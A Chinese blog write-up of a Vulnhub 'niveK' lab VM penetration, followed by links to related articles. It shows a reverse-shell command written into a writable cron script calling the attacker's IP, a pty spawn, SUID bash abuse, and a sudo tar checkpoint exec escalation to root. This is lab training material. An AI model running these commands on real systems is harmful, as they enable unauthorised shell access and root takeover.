NiveK 靶场渗透记录

最新推荐文章于 2024-11-01 18:34:38 发布
最新推荐文章于 2024-11-01 18:34:38 发布
阅读量395 收藏
点赞数
分类专栏: 靶场渗透攻略向 文章标签: linux 网络安全 ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fffhhdd/article/details/128705854
版权

NiveK 靶场渗透记录

一、日常扫ip

image-20230116152522405

靶机IP:192.168.44.129

kali:192.168.44.128

二、日常扫端口

image-20230116153102469

开放端口:21 ftp / 22 ssh / 7080 http,可以看到ftp给了登录名 Anonymous 但是没有密码,姑且尝试一下。

三、21ftp查看

image-20230116153312732

密码为空,登录是登录成功了,但是毛都没有…

四、7080查看

image-20230116153406044

是个医院登录页面,用户名和密码都没有,先用sqlmap尝试一下吧

image-20230116153700014

失败…先扫目录吧

五、日常扫目录

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ybIoc6nx-1673857389520)(C:\Users\ivers\AppData\Roaming\Typora\typora-user-images\image-20230116154128161.png)]

貌似也没有什么有用的信息… 卡住了 , 我靠…

看看页面源码吧~~

image-20230116154254588

乱输入尝试了下,发现有前端验证,是不是前端挡住了,没去后台,所有找不到注入点.

果断F12 查看一下

image-20230116154414178

果然是这里有验证,删掉,再试一下~

image-20230116154457407

我靠~~~~牛逼!

image-20230116154514682

主页看到了,查找看看有没有文件上传点.

找了半天,可惜没有. 但是源码中发现了线索。

image-20230116154614677

这里注释了一个页面,试了一下,有这个页面,还藏了上传点~~~

image-20230116154711761

六、挂马反弹shell

image-20230116154852600

F12查看一波,上传地址,kali nc 监听一波就搞定了~~~~走起!

image-20230116155003834

image-20230116155018065

七、提权

image-20230116155122290

先换个shell

python -c "import pty;pty.spawn('/bin/bash')"

查看一波用户:daemon

sudo -l 查看一下

image-20230116155228574

需要密码,看来不行,再尝试一下找一下sudo权限可执行文件吧。

image-20230116155348650

发现bin/bash,果断执行一下

image-20230116155420718

貌似没什么变化,shell前名变了~~~ = 。= |||

文件里搜罗一下吧。

image-20230116155516821

niveK 的home目录下,发现local.txt, cat 发现第一个flag

eren用户的目录无法查看,提示权限不足。看来先要想办法切成eren用户

找了半天,卡主~~攻略了下,我靠,原来前面的/bin/bash 没有加 -p ,所以权限没有提升~

image-20230116155702644

这他喵…(这里的-p其实还是没弄懂)

算了,进去目录看吧~~~~

image-20230116160346295

/etc/下看到好多定时任务,home目录下返现backup.sh可执行文件

image-20230116160606905

查看了定时任务文件crontab,发现很多定时任务,其中就有backup.sh,5分钟执行一次,可以拿那个文件再反弹个高权限shell过来。

image-20230116160921875

刚好,这个文件eren 可读可写,echo了反弹shell 的命令进去,kali 开启nc,等待就好…

echo 'bash -i >& /dev/tcp/192.168.44.128/4444 0>&1' >> backup.sh

image-20230116161013821

感觉等了一年~~我靠!

image-20230116161938459

image-20230116162027908

拿到eren的shell,sudo -l 查看,发现tar命令 ,查一下提权方法!

image-20230116162117808

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

image-20230116162151108

root账户到手,提权成功!

渗透结束!

PuPPET ER
关注
专栏目录
B2B市场采购指南.pdf
01-02
Mosconi和Nivek Sankaran共同撰写的报告,出自《麦肯锡高层管理论丛》2001年2期。这篇报告主要探讨了企业对企业(B2B)电子市集的价值及其可持续性。报告指出,B2B电子市集的成功并不单纯依赖于价格竞争,而是应该...
nivek靶场-vulnhub
lionwerson的博客
11-22 2857
https://download.vulnhub.com/hms/niveK.ovahttp://niveK靶场1.下载靶场,打开virtual box导入靶场,网络改为桥接模式,打开虚拟机。 2.nmap先来扫描一下端口: nmap 192.168.0.17 -p- 扫描出7080为web端口,浏览器打开发现登录页面: 抓包一下,看到登录页面有sql注入漏洞: 既然存在sql注入,那么就试了一下万能登录,登录成功,进入了后台: 进入后台寻找注入和上传点,另外扫描器找...
Vulnhub靶机:niveK
qq_48904485的博客
01-30 1122
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:niveK(10.0.2.41)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hms/niveK.ova。
Vulnhub_Nivek
qq_45434762的博客
08-29 626
主机信息kali:192.168.3.28 nivek:192.168.3.31 信息收集通过nmap探测目标主机发现开放了21、22、7080三个端口nmap -T4 -A -v -p-...
nivek(tar提权)
m0_66299232的博客
11-09 831
3.用-p提权上来发现euid变为了eren用户,那就可以进入用户目录,有一个backup.sh文件eren用户权限是可读可写可执行。7.在本地开启监听,尝试上传我们的php-reverse-shell.php(github里有),发现上传路径。2.寻找有suid执行权限的文件,发现有一个/bin/bash。4.把反弹shell的命令写入.sh文件中,等待反弹。1.用gobuster探测目录,没探测出来。5.成功登录进去,寻找可利用信息,和上传点。6.成功进入root,轻松拿下!点俩次放包,页面就进去了。
vlunhub系列之narak
hanjinming110的博客
08-05 265
vlunhub系列之narak
Linux特种文件系统--tmpfs文件系统
刘元林的博客
10-29 910
tmpfs类似于RamDisk(只能使用物理内存),使用虚拟内存(简称VM)子系统的页面存储文件。tmpfs完全依赖VM,遵循子系统的整体调度策略。说白了tmpfs跟普通进程差不多,使用的都是某种形式的虚拟内存,至于数据存储在物理内存中还是在交换分区中,全权交由VM子系统。定义: 是一个基于内存的文件系统,它在 RAM 中存储数据,因此访问速度非常快。用途: 通常用于存储临时文件,这些文件不需要永久保存,而且频繁读写。使用 可以减少对物理磁盘的磨损,并提高性能。示例路径:常见的 挂载点包括 、、 等。持
Camp4-L0:Linux 前置基础
fangsfdavid的博客
10-29 842
书生浦语大模型实战营第四期:Linux前置基础
Linux 之 信号概念、进程、进程间通信、线程、线程同步
挥剑决浮云的博客
11-01 437
如果释放互斥锁时有一个以上的线程阻塞,那么这些阻塞的线程会被唤醒,它们都会尝试对互斥锁进行加锁,当有一个线程成功对互斥锁上锁之后,其它线程就不能再次上锁了,只能再次陷入阻塞,等待下一次解锁。事实上,子进程是父进程的一个副本,譬如子进程拷贝了父进程的数据段、堆、栈以及继承了父进程打开的文件描述符,父进程与子进程并不共享这些存储空间,这是子进程对父进程相应部分存储空间的完全复制,执行fork()之后,每个进程均可修改各自的栈数据以及堆段中的变量,而并不影响另一个进程。是一族函数,而不是一个单独的函数。
Linux 』网络传输层 - TCP(二)
小侯宝的博客
11-01 614
为什么是三次握手三次握手是TCP为了保证双方通信时具有可靠性所定制的一种策略;而三次握手可以确保客户端和服务端至少都向对方发送了一次消息,从而确保连接建立的更为可靠;以朴素的角度来看三次握手实际上也可以被解析成四次握手;但为了提升连接创建的效率,TCP采用捎带应答的策略,在第二次握手中将ACK报文与SYN报文整合成了一个报文,即为SYN+ACK报文;在三次握手中能够确保双端都对对方进行一次消息的发送以及消息的接收来确保连接的稳定,因此三次握手中任何一次握手都不能少;
1Panel 是新一代的 Linux 服务器运维管理面板
qq_44534541的博客
10-29 457
1Panel 是一款新一代的 Linux 服务器运维管理面板,旨在通过现代化的 Web 界面帮助用户轻松管理 Linux 服务器。它集成了主机监控、文件管理、数据库管理、容器管理等功能,并且支持多语言和国际化,包括英语、中文(繁体)和日语。
Linux 进程优先级 进程切换
m0_74922218的博客
10-28 729
进程优先级、进程切换、Linux2.6.11下进程的调度队列的解释
linux TOP命令解析
酌沧
11-01 475
top命令的输出提供了有关系统总体负载、内存使用情况以及各个进程资源使用的实时信息。
Linux下docker中elasticsearch与kibana的安装
灿嘿嘿的博客分享
10-28 571
在本篇博客中,我将详细介绍如何在 Linux 系统中安装并配置 Elasticsearch 和 Kibana,这两者是 ELK 堆栈的重要组成部分,用于日志分析、数据搜索、可视化等场景。
Linux云计算 |【第五阶段】CLOUD-DAY7
最新发布
小安的运维专栏
11-01 756
在kubernetes平台上理解掌握各种控制器的用法:掌握kubectl管理命令、掌握POD原理、掌握集群调度的规则、熟悉控制器资源文件
Psensor 芯片al3006 ic linux 驱动
baidu_37552881的博客
10-28 713
MODULE_AUTHOR(“在线学习");
Linux】线程锁&同步互斥&生产消费模型
qq_48460693的博客
10-29 1048
Linux线程同步、生产消费模型
Linux系统编程篇》管道(Linux 进程间通信(IPC))——基础篇
Strange_Head的博客
11-01 705
Linux 中,进程是相互独立的,每个进程都有独立的内存空间。为了在不同进程之间交换数据,操作系统提供了各种 IPC 机制。这些机制可帮助进程完成数据共享、同步、通知和事件处理等任务。管道(Pipe)命名管道(FIFO)消息队列(Message Queue)共享内存(Shared Memory)信号(Signal)套接字(Socket)管道是最简单的 IPC 方式之一,适合在具有亲缘关系的进程(如父子进程)之间传递数据。管道是单向的,数据只能从一端流向另一端。
Linux 重启命令全解析:深入理解与应用指南
koukou3312的博客
10-28 331
Linux 系统中,掌握正确的重启命令是确保系统稳定运行和进行必要维护的关键技能。本文将深入解析 Linux 中常见的重启命令,包括功能、用法、适用场景及注意事项。
Linux shell编程学习笔记87:blkid命令——获取块设备信息
Purpleendurer@CSDN
10-29 859
在进行系统安全检测时,我们需要收集块设备的信息,这些可以通过blkid命令来获取。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值